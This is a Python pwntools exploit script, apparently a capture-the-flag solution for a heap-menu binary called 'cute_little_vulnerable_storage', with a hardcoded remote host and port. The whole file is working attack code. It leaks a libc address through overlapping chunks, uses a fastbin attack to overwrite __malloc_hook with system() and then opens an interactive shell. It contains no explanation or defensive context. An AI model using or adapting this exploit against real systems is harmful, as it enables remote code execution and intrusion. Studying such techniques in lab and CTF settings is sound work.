working.exploit.py

#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *

context.update(arch="amd64", os="linux")
context.log_level = 'error'

def one_gadget(filename, base_addr=0):
  return [(int(i)+base_addr) for i in subprocess.check_output(['one_gadget', '--raw', filename]).decode().split(' ')]

exe = ELF('./cute_little_vulnerable_storage')
libc = ELF('./libc.so.6')

rop = ROP(exe)

host, port = "3.99.48.161", "9005"

if args.REMOTE:
  p = remote(host,port)
else:
  p = process(exe.path)

buff = exe.bss(0xa00)			# a buffer on bss+0xa00 around
pop_rdi = rop.find_gadget(['pop rdi', 'ret'])[0]
csu1 = 0x4006ca
csu2 = 0x4006b0
gadget1 = 0x00000000004006cd # pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret

def add(size):
  p.sendlineafter('Exit\n\n','1')
  p.sendlineafter('size:', str(size))

def free(idx):
  p.sendlineafter('>>','2')
  p.sendlineafter('index:', str(idx))

def show(idx):
  p.sendlineafter('>>','4')
  p.sendlineafter('index:', str(idx))

def edit(idx, data):
  p.sendlineafter('>>','3')
  p.sendlineafter('index:', str(idx))
  p.sendafter('data:', data)


add(0xf8)  # 0
add(0x68)  # 1
add(0xf8)  # 2
add(0x20)  # 3

free(0)
free(1)
add(0x68)  # 4
edit(4, 'B'*0x68)

free(4)
add(0x68)  # 5
edit(5,b'B'*0x60+p64(0x170))

free(2)
add(0xf6)  # 6
edit(6, 'E'*0xf6)

show(5)
p.recvuntil('contents',drop=True)
leak = u64(p.recv(8))
print('leak = '+hex(leak))
libc.address = leak - 0x397b58
print('libc base = '+hex(libc.address))

free(6)
add(0xfe)  # 7
edit(7,'E'*0xf8+'\x70\x00\x00\x00\x00')

free(5)
free(7)
add(0x108) # 8
edit(8,b'F'*0xf8+p64(0x70)+p64(libc.symbols['__malloc_hook']-0x23))

add(0x68) # 9
add(0x68) # 10

onegadgets = one_gadget('libc.so.6', libc.address)
edit(10, b'A'*0x13+p64(libc.symbols['system']))

add(libc.symbols['system']+0x121f63)

p.interactive()